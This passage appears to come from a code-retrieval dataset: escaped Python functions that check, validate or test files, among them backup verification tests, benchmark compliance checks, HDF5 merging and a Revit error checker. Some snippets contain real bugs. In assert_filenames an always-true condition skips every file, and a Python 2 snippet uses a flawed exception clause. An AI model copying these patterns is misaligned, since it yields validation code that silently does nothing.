missingFile\npwd\nexit\n\"\"\"\n\n def _cbCheckResult(res):\n self.assertNotIn(self.testDir.asBytesMode().path, res)\n\n d = self._getBatchOutput(cmds)\n d.addCallback(_cbCheckResult)\n return d", "def check_training_result_files(folder, ruleset, quiet, werror):\n\n too_many_errors = False\n 
result_folder = os.path.join(folder, 'results')\n for system_folder in _get_sub_folders(result_folder):\n for benchmark_folder in _get_sub_folders(system_folder):\n folder_parts = benchmark_folder.split('/')\n benchmark = folder_parts[-1]\n system = folder_parts[-2]\n\n # If it is not a recognized benchmark, skip further checks.\n if benchmark not in _ALLOWED_BENCHMARKS:\n print('Skipping benchmark: {}'.format(benchmark))\n continue\n\n # Find all result files for this benchmark.\n pattern = '{folder}/result_*.txt'.format(folder=benchmark_folder)\n result_files = glob.glob(pattern, recursive=True)\n\n # No result files were found. That is okay, because the organization\n # may not have submitted any results for this benchmark.\n if not result_files:\n print('No Result Files!')\n continue\n\n _print_divider_bar()\n print('System {}'.format(system))\n print('Benchmark {}'.format(benchmark))\n\n # If the organization did submit results for this benchmark, the number\n # of result files must be an exact number.\n if len(result_files) != _EXPECTED_RESULT_FILE_COUNTS[benchmark]:\n print('Expected {} runs, but detected {} runs.'.format(\n _EXPECTED_RESULT_FILE_COUNTS[benchmark],\n len(result_files)))\n\n errors_found = 0\n result_files.sort()\n for result_file in result_files:\n result_basename = os.path.basename(result_file)\n result_name, _ = os.path.splitext(result_basename)\n run = result_name.split('_')[-1]\n\n # For each result file, run the benchmark's compliance checks.\n _print_divider_bar()\n print('Run {}'.format(run))\n config_file = '{ruleset}/common.yaml'.format(\n ruleset=ruleset,\n benchmark=benchmark)\n checker = mlp_compliance.make_checker(\n ruleset=ruleset,\n quiet=quiet,\n werror=werror)\n valid, _, _, _ = mlp_compliance.main(result_file, config_file, checker)\n if not valid:\n errors_found += 1\n if errors_found == 1:\n print('WARNING: One file does not comply.')\n print('WARNING: Allowing this failure under olympic scoring rules.')\n if errors_found > 1:\n too_many_errors = True\n\n _print_divider_bar()\n if too_many_errors:\n raise Exception('Found too many errors in logging, see log above for details.')", "def assert_filenames(self):\n print(\"Asserting filenames: \", end=\"\")\n error_files = []\n\n for data_dir in data_settings.BLOCK_DATA_DIRS:\n\n filenames = os.listdir(data_dir)\n\n for filename in filenames:\n\n if 'aux.xml' in filename or 'yield':\n\n continue\n\n try:\n\n filename_split = filename.split(\"_\")\n date = filename_split[0]\n _, suffix = filename_split[-1].split(\".\")\n\n assert suffix == 'tif', \"Wrong file suffix\"\n assert len(date) == 8, \"Wrong amount of numbers in date\"\n assert date[0:4] == '2017', \"Year is wrong\"\n assert date[4] == '0', \"No double digit months in dataset\"\n assert date[5] in ['4', '5', '6', '7', '8',\n '9'], \"Month outside dataset range\"\n assert date[6] in ['0', '1', '2',\n '3'], \"Ten-indicator for day is wrong\"\n assert date[7] in ['0', '1', '2', '3', '4', '5',\n '6', '7', '8', '9'], \"Date is not a digit\"\n assert 'ndvi' in filename or 'drone_rgb' in filename or 'drone_ndvi' in filename, \"Proper type is missing\"\n\n if 'sentinel_ndvi' in filename:\n\n assert len(filename) == 26, \"Filename wrong for {} in {}\".format(\n filename, data_dir)\n\n if 'drone_ndvi' in filename:\n\n assert len(filename) == 23, \"Filename wrong for {} in {}\".format(\n filename, data_dir)\n\n if 'drone_rgb' in filename:\n\n assert len(filename) == 22, \"Filename wrong for {} in {}\".format(\n filename, data_dir)\n\n except 
(AssertionError, ValueError) as ex:\n\n error_files.append(\"{}: {}\".format(\n ex, os.path.join(data_dir, filename)))\n\n if not error_files:\n\n print(\"All generated block datasets named correctly!\")\n\n else:\n\n print(\"There were some problems with the following files\")\n\n for error_file in error_files:\n print(\"\\t{}\".format(error_file))", "def check_comps(root, comps):\n for key, comp in comps.items():\n\n filename = os.path.join(root, comp['filename'])\n if not os.path.isfile(filename):\n warnings.warn(\n 'The file {0} could not be found'.format(filename))", "def test_verify_corrupt_archive(self):\n self.backup(u\"full\", u\"testfiles/various_file_types\", options=[])\n output_files = os.listdir(\"testfiles/output\")\n archives = [elem for elem in output_files if \"vol\" in elem]\n for archive in archives:\n # Edit source file\n with open(\"testfiles/output/\" + archive, 'r+') as f:\n f.write('This writes text into each archive file to corrupt it.')\n # Test verify for the file\n try:\n self.verify(u'testfiles/various_file_types/executable', file_to_verify=u'executable', options=[])\n except CmdError as e:\n # Should return a 21 error code for \"hash mismatch\"\n self.assertEqual(e.exit_status, 21, str(e))\n else:\n self.fail('Expected Hash Mismatch Error not thrown')", "def test_stress_strain_both_files(generate_two_files_both_stress_strain):\n fname = generate_two_files_both_stress_strain\n with pytest.raises(Exception):\n process_files([fname[0],fname[1]])", "def combine(files, output):\n # read all files\n bxrs = [h5py.File(f,'r') for f in files]\n # some paths we might care about & will copy\n metadata_paths = [\n '3BRecInfo/3BRecVars/MaxVolt',\n '3BRecInfo/3BRecVars/MinVolt',\n '3BRecInfo/3BRecVars/BitDepth',\n '3BRecInfo/3BRecVars/SignalInversion',\n '3BRecInfo/3BRecVars/SamplingRate',\n '3BRecInfo/3BRecVars/ExperimentType',\n '3BRecInfo/3BMeaChip/NRows',\n '3BRecInfo/3BMeaChip/NCols',\n '3BRecInfo/3BMeaChip/Layout',\n '3BRecInfo/3BMeaChip/MeaType',\n '3BRecInfo/3BMeaSystem/FwVersion',\n '3BRecInfo/3BMeaSystem/HwVersion',\n '3BRecInfo/3BMeaSystem/System'\n ]\n\n # count n_frames, n_samples from each file\n # also verify that key metadata matches\n n_frames = bxrs[0]['3BRecInfo/3BRecVars/NRecFrames'][0]\n n_samples = [bxrs[0]['3BData/Raw'].shape[0]]\n sampling_rate = bxrs[0]['3BRecInfo/3BRecVars/SamplingRate'][0]\n print(\"checking that all brw files have matching metadata\")\n for b in bxrs[1:]:\n for m in metadata_paths:\n try:\n if len(bxrs[0][m])==1:\n assert bxrs[0][m][:] == b[m][:]\n else:\n assert np.all(bxrs[0][m][:] == b[m][:])\n except Exception as E:\n logger.warn(f\"\"\"metadata does not match for {m}:\n found {bxrs[0][m]} and {b[m]}\n \"\"\")\n n_frames += b['3BRecInfo/3BRecVars/NRecFrames'][0]\n n_samples.append(b[\"3BData/Raw\"].shape[0])\n print(f\"combined duration: {n_frames/sampling_rate/60:.2f} minutes\")\n\n out_bxr = h5py.File(output, \"w\")\n # copy metadata\n bxrs[0].visititems(partial(glia.copy_metadata, copy_to=out_bxr))\n\n # copy data\n out_bxr['3BRecInfo/3BRecVars/NRecFrames'] = [n_frames]\n out_bxr['nSamplesPerRecording'] = n_samples\n tot_samples = sum(n_samples)\n assert np.isclose(tot_samples/n_frames, 4096) #4096 channels\n \n # copy raw data\n raw_dtype = bxrs[0][\"3BData/Raw\"].dtype\n dset = out_bxr.create_dataset(\"3BData/Raw\", (tot_samples,),\n dtype=raw_dtype)\n start_sample = 0\n max_chunk = int(1e8) # <1GiB \n for i, b in enumerate(bxrs):\n print(f\"Copying {files[i]}\")\n end_sample = start_sample+n_samples[i]\n for s in 
tqdm(range(0,n_samples[i],max_chunk)):\n e = min(s+max_chunk, end_sample)\n dset[start_sample+s:start_sample+e] = b[\"3BData/Raw\"][s:e]\n start_sample = end_sample\n\n # cleanup\n out_bxr.close()\n [b.close() for b in bxrs]", "def test_errors(in_fastq, references):\n error_checks = [0, 1, 2, 3]\n for error in error_checks:\n for ref in references:\n print ref[\"file\"], error\n run_bowtie(in_fastq, ref[\"file\"], None, error, 1e6)", "def testFailFiles(self):\n # Cleaning possible files already occupying the available set\n self.dummySubscription.failFiles([])\n\n # First test - Test if initial file (on available set) is inserted in the\n # failed set - no arguments\n\n dummyFile2 = File('/tmp/dummyfile2,8888', 1, 1, 1)\n # Insert dummyFile2 into the available files Set at dummySubscription\n self.dummySubscription.available.addFile(dummyFile2)\n\n S = self.dummySubscription.availableFiles()\n # Fail all files\n self.dummySubscription.failFiles(S)\n\n assert len(self.dummySubscription.availableFiles()) == 0, \\\n \"failed subscription still has %s files, what's up with that?\" % \\\n len(self.dummySubscription.availableFiles())\n\n # Second test - Test if target files are inserted at the failed set\n\n dummyFileList = []\n # Populating the dummy List with a random number of files\n for i in range(1, random.randint(100, 1000)):\n lfn = '/store/data/%s/%s/file.root' % (random.randint(1000, 9999),\n random.randint(1000, 9999))\n size = random.randint(1000, 2000)\n events = 1000\n run = random.randint(0, 2000)\n lumi = random.randint(0, 8)\n\n file = File(lfn=lfn, size=size, events=events,\n checksums={\"cksum\": \"1\"})\n file.addRun(Run(run, *[lumi]))\n dummyFileList.append(file)\n # Add the new files\n self.dummySubscription.available.addFile(dummyFileList)\n # and fail them\n self.dummySubscription.failFiles(files=dummyFileList)\n # Check there are no files available - everything should be failed\n assert len(self.dummySubscription.availableFiles()) == 0, \\\n \"failed subscription still has %s files, what's up with that?\" % \\\n len(self.dummySubscription.availableFiles())\n\n # Check if all files were inserted at subscription's failed files Set\n for x in dummyFileList:\n assert x in self.dummySubscription.failed.getFiles(type='set'), \\\n 'Couldn\\'t make file failed %s' % x.dict['lfn']\n\n # Third test - Test if a replicate file is erased from the other Sets,\n # when a file is considered failed\n\n dummyFile3 = File('/tmp/dummyfile3,5555', 1, 1, 1)\n dummyFileList = []\n dummyFileList.append(dummyFile3)\n\n # Inserting dummyFile3 to be used as an argument, into each of the other\n # file sets\n self.dummySubscription.acquired.addFile(dummyFile3)\n self.dummySubscription.available.addFile(dummyFile3)\n self.dummySubscription.completed.addFile(dummyFile3)\n\n # Run the method failFiles\n self.dummySubscription.failFiles(files=dummyFileList)\n\n # Check if dummyFile3 was inserted at the failed Set\n assert dummyFile3 in self.dummySubscription.failed.getFiles(type='set'), \\\n 'Replicated file could\\'nt be inserted at failed Set'\n\n # Check if dummyFile3 was erased from all the other Sets\n assert dummyFile3 not in self.dummySubscription.acquired.getFiles(type='set'), \\\n 'Failed file still present at acquired Set'\n assert dummyFile3 not in self.dummySubscription.completed.getFiles(type='set'), \\\n 'Failed file still present at completed Set'\n assert dummyFile3 not in self.dummySubscription.available.getFiles(type='set'), \\\n 'Failed file still present at available Set'", "def 
checkCopiedFiles(self):\n self.missingAiCopies = 0\n self.invalidAiCopies = 0\n self.invalidMapCopies = 0\n self.missingMapCopies = 0\n\n for iFile in self.inputFilesAll:\n if not (os.path.isfile(self.MAPCOPY + iFile + '.msb')):\n self.missingMapCopies += 1\n else:\n with open(self.MAPCOPY + iFile + '.msb', 'rb') as testFile:\n if (len(testFile.read()) < 10):\n self.invalidMapCopies += 1\n\n if not (iFile == \"m12_00_00_01\"):\n if (self.useDCX):\n if not (os.path.isfile(self.AICOPY + iFile + '.luabnd.dcx')):\n self.missingAiCopies += 1\n else:\n with open(self.AICOPY + iFile + '.luabnd.dcx', 'rb') as testFile:\n if (len(testFile.read()) < 10):\n self.invalidAiCopies += 1\n else:\n if not (os.path.isfile(self.AICOPY + iFile + '.luabnd')):\n self.missingAiCopies += 1\n else:\n with open(self.AICOPY + iFile + '.luabnd', 'rb') as testFile:\n if (len(testFile.read()) < 10):\n self.invalidAiCopies += 1\n\n if (self.missingAiCopies > 0 or self.invalidAiCopies > 0 or self.missingMapCopies > 0 or self.invalidMapCopies > 0 or self.missingSfxCopies > 0 or self.invalidSfxCopies > 0):\n return False\n else:\n return True", "def test_duplicate_images_error(self):\n with self.assertRaises(AssertionError):\n disk.merge_datasets(self.input_datasets, self.output_dataset)\n\n # Original dataset shouldn't be modified.\n self.assertEqual(0, len(self.output_dataset.metadata()))", "def test_verify_corrupt_archive_compare_data(self):\n self.backup(u\"full\", u\"testfiles/various_file_types\", options=[])\n output_files = os.listdir(\"testfiles/output\")\n archives = [elem for elem in output_files if \"vol\" in elem]\n for archive in archives:\n # Edit source file\n with open(\"testfiles/output/\" + archive, 'r+') as f:\n f.write('This writes text into each archive file to corrupt it.')\n # Test verify for the file\n try:\n self.verify(u'testfiles/various_file_types/executable', file_to_verify=u'executable',\n options=[u\"--compare-data\"])\n except CmdError as e:\n # Should return a 21 error code for \"hash mismatch\"\n self.assertEqual(e.exit_status, 21, str(e))\n else:\n self.fail('Expected Hash Mismatch Error not thrown')", "def check_files(filenames, fix, verboseout, summaryout):\n\tokmsg = \"OK\" if not fix else \"fixed\"\n\tbadmsg = \"non-conforming\"\n\tbad_files = 0\n\tfor fn in filenames:\n\t\tlines = read_file_and_maybe_fix_it(fn, fix)\n\t\tif check_content(fn, lines, verboseout):\n\t\t\tprint(\"{:s}: {}\".format(fn, okmsg), file=summaryout)\n\t\telse:\n\t\t\tbad_files += 1\n\t\t\tmsg = \"{:s}: {}\".format(fn, badmsg)\n\t\t\tprint(msg, file=summaryout)\n\treturn bad_files", "def _test_align_file_existance(self):\n if len(self._pathcreator.get_read_files()) == 0:\n self._write_err_msg_and_quit(\"Error! No read libraries given!\\n\")\n if len(self._ref_seq_files) == 0:\n self._write_err_msg_and_quit(\n \"Error! 
No reference sequence files given!\\n\"\n )", "def test_does_not_validate_invalid_files(self):\n bad_files = (\n 'newstest2019-defr-src-ts.de.sgm',\n 'newstest2019-defr-src-ts.de.xml',\n )\n for bad_file in bad_files:\n bad_path = join(getcwd(), 'testdata', bad_file)\n with self.assertRaises(ValueError):\n _ = valitest.ValidatableTestSet(bad_path)", "def perform_filecheck():\n\n\t# Open files\n\ttrain = open('train_aae_final', 'r')\n\ttest = open('test_aae_final', 'r')\n\n\n\t# Check number of training and testing samples\n\tprint (\"\")\n\tprint (\"Number of training samples =\", len(train.readlines()))\n\tprint (\"Number of testing samples =\", len(test.readlines()))\n\tprint (\"\")\n\n\ttrain.close()\n\ttest.close()", "def test_css_top_files_belong(self):\n top, std, bottom = heavy_lifting.organize_css_files(self.fake_file_list)\n for fle in top:\n self.assertIn(os.path.basename(fle), list_css_top_files())", "def test_css_bottom_files_belong(self):\n top, std, bottom = heavy_lifting.organize_css_files(self.fake_file_list)\n for fle in bottom:\n self.assertIn(os.path.basename(fle), list_css_bottom_files())", "def test_stress_not_in_two_files(generate_no_stress_one_file):\n fname = generate_no_stress_one_file\n with pytest.raises(Exception):\n process_files([fname, fname])", "def hash_check_files(self):\n temp_error = 0\n if not self.hash_log_curr:\n self.hash_log_curr = self.hash_curr_files\n else:\n for key, value in self.hash_curr_files.iteritems():\n if key in self.hash_log_curr:\n #test for valid hash\n if self.valid is not None:\n #test any valid hahses are given\n if key in self.valid:\n # a hash code that is ok to duplicate\n self.print_to_log('Valid Duplicate HashCode, skipping: ' + value[5])\n self.hash_log_curr[key][3] = str(int(self.hash_log_curr[key][3]) + 1)\n self.hash_log_curr[key][4] = value[4]\n continue\n # not valid duplicate hash\n # a dupulicate hash found which is a failure and should abort import\n self.hash_log_curr[key][0] = 'Fail'\n self.hash_log_curr[key][3] = str(int(self.hash_log_curr[key][3]) + 1)\n self.hash_log_curr[key][4] = value[4]\n self.hash_log_curr[key][5] += ', ' + value[5]\n self.print_to_log('Duplicate hash found for file: ' + value[5])\n temp_error = 1\n else:\n #a new hash, no issues\n self.hash_log_curr[key] = value\n self.print_to_log('New Hash for file: ' + value[5])\n self.error = temp_error", "def allSWCImport_test():\n\n swcFiles = []\n\n for dirPath, dirNames, fileNames in os.walk(\"tests/117.v3dpbd\"):\n\n swcFiles += [os.path.join(dirPath, fileName)\n for fileName in fileNames if fileName.endswith(\".swc\")]\n\n for swcFile in swcFiles:\n\n print(\"Testing the import of {}\".format(swcFile))\n try:\n NeuronMorphology(swcFile)\n\n except Exception as e:\n if swcFile in [\n 'tests/117.v3dpbd/10_117.v3dpbd_ENT_updated.swc',\n \"tests/117.v3dpbd/05_117.v3dpbd_Advantra.swc\",\n \"tests/117.v3dpbd/15_117.v3dpbd_app2new2.swc\",\n \"tests/117.v3dpbd/01_117.v3dpbd_axis_analyzer.swc\",\n \"tests/117.v3dpbd/18_117.v3dpbd_x1439_y1439_z474_app2.swc\",\n \"tests/117.v3dpbd/13_117.v3dpbd_app2new1.swc\",\n \"tests/117.v3dpbd/12_117.v3dpbd_Advantra_updated.swc\",\n \"tests/117.v3dpbd/19_117.v3dpbd_NeuroGPSTree_updated.swc\",\n \"tests/117.v3dpbd/21_117.v3dpbd_tubularity_model_S.v3draw_MST_Tracing_Ws_21_th_200.swc\",\n \"tests/117.v3dpbd/14_117.v3dpbd_app2new3.swc\",\n \"tests/117.v3dpbd/20_117.v3dpbd_tubularity_model_S.v3draw_MST_Tracing_Ws_21_th_170_updated.swc\",\n \"tests/117.v3dpbd/11_117.v3dpbd_NeuronChaser_updated.swc\",\n 
\"tests/117.v3dpbd/22_117.v3dpbd_Rayshooting.swc\",\n ]:\n print(e)\n assert type(e) is NotImplementedError and \\\n str(e) == \"No Soma Found for {}\".format(swcFile)\n elif swcFile in [\n \"tests/117.v3dpbd/03_117.v3dpbd_NeuroGPSTree.swc\",\n \"tests/117.v3dpbd/08_117.v3dpbd_neutube_updated.swc\",\n \"tests/117.v3dpbd/04_117.v3dpbd_axis_analyzer_updated.swc\",\n \"tests/117.v3dpbd/06_117.v3dpbd_MOST.swc\",\n \"tests/117.v3dpbd/09_117.v3dpbd_neutu_autotrace.swc\",\n \"tests/117.v3dpbd/07_117.v3dpbd_neutube.swc\",\n \"tests/117.v3dpbd/02_117.v3dpbd_MST_Tracing.swc\",\n ]:\n print(e)\n assert type(e) is ValueError and \\\n str(e) == \"Given SWC File {} has more than one trees\".format(swcFile)\n\n elif swcFile in [\n \"tests/117.v3dpbd/16_117.v3dpbd_EnsembleNeuronTracerV2n.swc\",\n \"tests/117.v3dpbd/17_117.v3dpbd_EnsembleNeuronTracerV2s.swc\"\n ]:\n print(e)\n assert type(e) is AssertionError and \\\n str(e) == \"File {} has cyclic connections!\".format(swcFile)\n\n else:\n print(e)\n assert False", "def test_file_analyzer(self):\r\n file_analyzer = FileAnalyzer(\"C:\\\\Users\\\\Himan\\\\Desktop\\\\Semester 2\\\\SSW 810\\\\HW\\\\Assignment 8\")\r\n self.assertEqual(file_analyzer.files_summary, {'HW08_Himanshu.py': {'class': 1, 'function': 5, 'line': 100, 'char': 4472}, \\\r\n 'HW08_Test_Himanshu.py': {'class': 1, 'function': 3, 'line': 38, 'char': 1861}})\r\n self.assertNotEqual(file_analyzer.files_summary, {'HW08_Himanshu.py': {'class': 0, 'function': 5, 'line': 46, 'char': 1931}})\r\n\r\n self.assertNotEqual(file_analyzer.files_summary, {'HW08_Himanshu.py': {'class': 1, 'function': 5, 'line': 100}}) # testing less fields\r\n\r\n with self.assertRaises(FileNotFoundError): # raises exception error\r\n FileAnalyzer(\"C:\\\\Users\\\\Himan\\\\Desktop\\\\Semester 2\\\\SSW 810\\\\HW\\\\Assignment 10\").files_summary", "def output_errors(outputs, gold, sick_ids, sick_sentences):\n with open('./working/err.txt', 'w') as out_f:\n out_f.write('pair_ID\\tdiff\\tpred\\tcorr\\tsentence1\\tsentence2\\n')\n errs = []\n for i, line in enumerate(outputs):\n data = line\n corr = gold[i]\n diff = abs(data-corr)\n if diff > 0.75:\n errs.append((sick_ids[i], round(diff, 1), round(data, 1), corr, ' '.join(sick_sentences[i][0]), ' '.join(sick_sentences[i][1])))\n\n errs.sort(key=lambda x:-x[1])\n\n for line in errs:\n out_f.write('{0}\\t{1}\\t{2}\\t{3}\\t{4}\\t{5}\\n'.format(*line))", "def storefront_check_errors():\n\n\tcurrentView = uidoc.ActiveView\n\tfamTypeDict = GetFamilyTypeDict(\"Fabrication-Error-Symbol\")\n\n\t# Clear existing error notations\n\terrorNotations = list(GetElementsInView(BuiltInCategory.OST_GenericAnnotation, Autodesk.Revit.DB.FamilyInstance, currentView.Id))\n\terrorNotations = FilterElementsByName(doc, errorNotations,[\"Fabrication\",\"Error-Symbol\"], False)\n\tif errorNotations:\n\t\twith rpw.db.Transaction(\"Place Errors\"):\n\t\t\tfor error in errorNotations:\n\t\t\t\tdoc.Delete(error)\n\n\n\tdef PointsAndErrors(mullions_list, errorName, cat_or_ids):\n\t\t\"\"\"adds to lists of points and errors\"\"\"\n\t\terrorsToFlag = []\n\t\tcompList =[]\n\t\tfor m in mullions_list:\n\t\t\tmElem = doc.GetElement(m)\n\t\t\tif m not in compList:\n\t\t\t\tintersectingMulls = FindIntersectingMullions(mElem, cat_or_ids)\n\t\t\t\tif list(intersectingMulls):\n\t\t\t\t\tmullPt = mElem.Location.Point\n\t\t\t\t\terrorsToFlag.append([mullPt, errorName])\n\t\t\t\t\tfor mm in list(intersectingMulls):\n\t\t\t\t\t\tcompList.append(mm.Id)\n\t\treturn errorsToFlag\n\n\tdef MullionClash():\n\n\t\terrorsToFlag = 
[]\n\n\t\tselectedLevel = __revit__.ActiveUIDocument.ActiveView.GenLevel.Id\n\n\t\tallMullions = GetAllElements(doc, BuiltInCategory.OST_CurtainWallMullions, Autodesk.Revit.DB.FamilyInstance, currentView=True)\n\t\tallWalls = GetAllElements(doc, BuiltInCategory.OST_Walls, Autodesk.Revit.DB.Wall, currentView=True)\n\n\t\tallWalls = FilterElementsByName(doc, allWalls, [\"Storefront\",\"Storefront\"], True)\n\n\t\terrorsToFlag += PointsAndErrors(allMullions, \"Mullion-Mullion Intersects\", BuiltInCategory.OST_CurtainWallMullions)\n\t\terrorsToFlag += PointsAndErrors(allMullions, \"Mullion-Panel Intersects\", BuiltInCategory.OST_CurtainWallPanels)\n\t\tif allWalls:\n\t\t\terrorsToFlag += PointsAndErrors(allMullions, \"Mullion-Wall Intersects\", allWalls)\n\n\t\treturn errorsToFlag\n\n\tdef PanelClash():\n\n\n\t\terrorsToFlag = []\n\t\t\n\t\tallPanels = GetAllElements(doc, BuiltInCategory.OST_Windows, Autodesk.Revit.DB.FamilyInstance, currentView=True)\n\t\tallPanels = FilterDemolishedElements(doc, allPanels)\n\n\t\tpanelMinWidth = 0.45\n\t\tpanelMaxWidth = 5.0\n\t\tpanelMaxHeight = 8.14\n\n\t\t### ITERATE OVER PANEL LIST ###\n\t\tfor p in allPanels:\n\t\t\tfamInst = doc.GetElement(p)\n\n\t\t\tpan_height = famInst.Parameter[BuiltInParameter.FAMILY_HEIGHT_PARAM].AsDouble()\n\t\t\tpan_width = famInst.Parameter[BuiltInParameter.FAMILY_WIDTH_PARAM].AsDouble()\n\n\t\t\tif \"empty\" not in famInst.Name.lower():\n\t\t\t\tif pan_width < panelMinWidth:\n\t\t\t\t\terrorsToFlag.append([famInst.GetTransform().Origin, \"Small Panel\"])\n\t\t\t\telif pan_width > panelMaxWidth:\n\t\t\t\t\terrorsToFlag.append([famInst.GetTransform().Origin, \"Wide Panel\"])\n\t\t\t\telif pan_height > panelMaxHeight:\n\t\t\t\t\terrorsToFlag.append([famInst.GetTransform().Origin, \"Tall Panel\"])\n\t\t\telse:\n\t\t\t\tpass\n\t\t\n\t\treturn errorsToFlag\n\n\tdef ECWallClash():\n\n\t\terrorsToFlag = []\n\t\tcolumnsLinesEdgesEC = []\n\t\twallsLinesEdgesEC = []\n\n\n\t\tdocLoaded = RevitLoadECDocument(quiet=True)\n\t\tif docLoaded[0]:\n\t\t\tdocEC = docLoaded[0]\n\t\t\tecTransform = docLoaded[1]\n\n\t\t\tselectedLevel = __revit__.ActiveUIDocument.ActiveView.GenLevel.Id\n\n\t\t\tselectedLevelInst = doc.GetElement(selectedLevel)\n\t\t\tlevelElevationEC = None \n\t\t\tfor p in selectedLevelInst.Parameters:\n\t\t\t\tif p.Definition.Name == \"Elevation\":\n\t\t\t\t\tlevelElevationEC = p.AsDouble()\n\n\t\t\tallWallsEC = GetAllElements(docEC, BuiltInCategory.OST_Walls, Autodesk.Revit.DB.Wall)\n\t\t\tallColumnsEC = GetAllElements(docEC, BuiltInCategory.OST_Columns, Autodesk.Revit.DB.FamilyInstance)\n\t\t\tallColumnsEC += GetAllElements(docEC, BuiltInCategory.OST_StructuralColumns, Autodesk.Revit.DB.FamilyInstance)\n\n\t\t\tselectedWallsEC = FilterElementsByLevel(docEC, allWallsEC, levelElevationEC)\n\t\t\tselectedColumnsEC = FilterElementsByLevel(docEC, allColumnsEC, levelElevationEC)\n\n\t\t\twallsLinesEdgesEC = GetWallEdgeCurves(docEC, selectedWallsEC, ecTransform)\n\t\t\tcolumnsLinesEdgesEC = GetColumnEdgeCurves(docEC, selectedColumnsEC, ecTransform)\n\n\t\tallWalls = GetAllElements(doc, BuiltInCategory.OST_Walls, Autodesk.Revit.DB.Wall, currentView=True)\n\t\tstorefrontWalls = FilterElementsByName(doc, allWalls,[\"Storefront\",\"Storefront\"], False)\n\t\tstorefrontWalls = FilterWallsByKind(doc, storefrontWalls, \"Basic\")\n\n\t\tobstructionEdges = columnsLinesEdgesEC\n\t\tobstructionEdges += wallsLinesEdgesEC\n\n\t\tif obstructionEdges:\n\t\t\tfor sfWallId in storefrontWalls:\n\t\t\t\tsfWall = doc.GetElement(sfWallId)\n\t\t\t\tlocLine 
= sfWall.Location.Curve\n\t\t\t\tlocLineStart = locLine.GetEndPoint(0)\n\t\t\t\tlocLineEnd = locLine.GetEndPoint(1)\n\n\t\t\t\tfor obstructionLine in obstructionEdges:\n\t\t\t\t\tobstLineElevation = obstructionLine.GetEndPoint(0).Z\n\t\t\t\t\tlocLineStart = XYZ(locLineStart.X, locLineStart.Y, obstLineElevation)\n\t\t\t\t\tlocLineEnd = XYZ(locLineEnd.X, locLineEnd.Y, obstLineElevation)\n\t\t\t\t\tlocLineFlat = Line.CreateBound(locLineStart, locLineEnd)\n\t\t\t\t\tintersection = RevitCurveCurveIntersection(locLineFlat,obstructionLine)\n\n\t\t\t\t\tif intersection:\n\t\t\t\t\t\t#ERROR: Hit Existing Condition\n\t\t\t\t\t\terrorsToFlag.append([intersection, \"Hit EC\"])\n\n\t\treturn errorsToFlag\n\n\tallErrors = []\n\tallErrors += ECWallClash()\n\tallErrors += MullionClash()\n\tallErrors += PanelClash()\n\n\terrorSymbolId = famTypeDict[\"Fabrication-Error-Symbol\"]\n\n\tif allErrors:\n\t\twith rpw.db.Transaction(\"Error Check\"):\n\t\t\tRevitPlaceErrorsInView(currentView, allErrors, errorSymbolId)", "def test_check_mapping_file_multiple_problems(self):\r\n\r\n check_mapping_file(mapping_fp=self.errors_warnings_mapping_fp,\r\n output_dir=self.output_dir,\r\n added_demultiplex_field=\"DoesNotExist\",\r\n verbose=False)\r\n\r\n # Check existence of expected output files\r\n output_html_fp = join(self.output_dir,\r\n basename(self.errors_warnings_mapping_fp).replace('.txt', '.html'))\r\n output_corrected_fp =\\\r\n join(self.output_dir,\r\n basename(self.errors_warnings_mapping_fp).replace('.txt',\r\n '_corrected.txt'))\r\n output_log_fp =\\\r\n join(self.output_dir,\r\n basename(self.errors_warnings_mapping_fp).replace('.txt', '.log'))\r\n overlib_js_fp = join(self.output_dir, 'overlib.js')\r\n\r\n self.assertTrue(exists(output_html_fp))\r\n self.assertTrue(exists(output_corrected_fp))\r\n self.assertTrue(exists(output_log_fp))\r\n self.assertTrue(exists(overlib_js_fp))\r\n\r\n # Check output data for expected results\r\n\r\n html_data = \"\".join([line for line in open(output_html_fp, \"U\")])\r\n corrected_data =\\\r\n \"\".join([line for line in open(output_corrected_fp, \"U\")])\r\n log_data = \"\".join([line for line in open(output_log_fp, \"U\")])\r\n\r\n self.assertEqual(html_data, self.expected_html_errors_warnings_output)\r\n self.assertEqual(corrected_data,\r\n self.expected_corrected_data_errors_warnings)\r\n self.assertEqual(log_data, self.expected_log_errors_warnings_output)", "def checkMissingFiles(inDir, jsonUrl):\n\n file_list = []\n remote = False\n try:\n file_list = os.listdir(inDir)\n except OSError:\n remote = True\n file_list = eos_ls(inDir)\n\n if file_list == []:\n print \"Directory does not exist or is empty!\"\n return []\n\n total_expected = 0\n missing_files = []\n suspicious_files = []\n recovered_files = []\n\n print 'Found %d files in input directory' % len(file_list)\n print 20*'-'\n\n jsonFile = open(jsonUrl,'r')\n procList = json.load(jsonFile,encoding = 'utf-8').items()\n\n for proc in procList:\n for desc in proc[1]:\n data = desc['data']\n isData = desc.get('isdata',False)\n mctruthmode = desc.get('mctruthmode')\n for d in data:\n dtag = d.get('dtag','')\n split = d.get('split',1)\n\n for segment in range(0,split):\n eventsFile = dtag\n if split > 1:\n eventsFile = dtag + '_' + str(segment)\n if mctruthmode:\n eventsFile += '_filt%d' % mctruthmode\n filename = eventsFile+'.root'\n\n sys.stdout.write('... 
checking %s' % filename)\n sys.stdout.flush()\n\n total_expected += 1\n\n if not filename in file_list:\n missing_files.append(filename)\n sys.stdout.write('\\033[91m MISSING \\033[0m \\n')\n # sys.stdout.flush()\n continue\n\n rootFileUrl = os.path.join(inDir, filename)\n if remote:\n rootFileUrl = ('root://eoscms//eos/cms/store' +\n rootFileUrl.split('store',1)[1])\n\n recovered, suspicious = False, False\n tfile = TFile.Open(rootFileUrl)\n try:\n if tfile.TestBit(TFile.kRecovered):\n recovered = True\n if tfile.IsZombie():\n suspicious = True\n tfile.Close()\n except AttributeError, ReferenceError:\n suspicious = True\n\n if recovered:\n sys.stdout.write('\\033[93m Recovered \\033[0m \\n')\n recovered_files.append(filename)\n if suspicious:\n sys.stdout.write('\\033[93m Failed to open \\033[0m \\n')\n suspicious_files.append(filename)\n\n sys.stdout.write('\\033[92m OK \\033[0m \\n')\n sys.stdout.flush()\n\n print 20*'-'\n if len(missing_files):\n print \"Missing the following files:\"\n print \"(%d out of %d expected)\"% (len(missing_files), total_expected)\n for filename in missing_files:\n print filename\n else:\n print \"NO MISSING FILES!\"\n print 20*'-'\n if len(suspicious_files):\n print \"Failed to open the following files:\"\n print \"(%d out of %d expected)\"% (len(suspicious_files), total_expected)\n for filename in suspicious_files:\n print filename\n print 20*'-'\n if len(recovered_files):\n print \"The following files are recovered:\"\n print \"(%d out of %d expected)\"% (len(recovered_files), total_expected)\n for filename in recovered_files:\n print filename\n print 20*'-'\n\n return 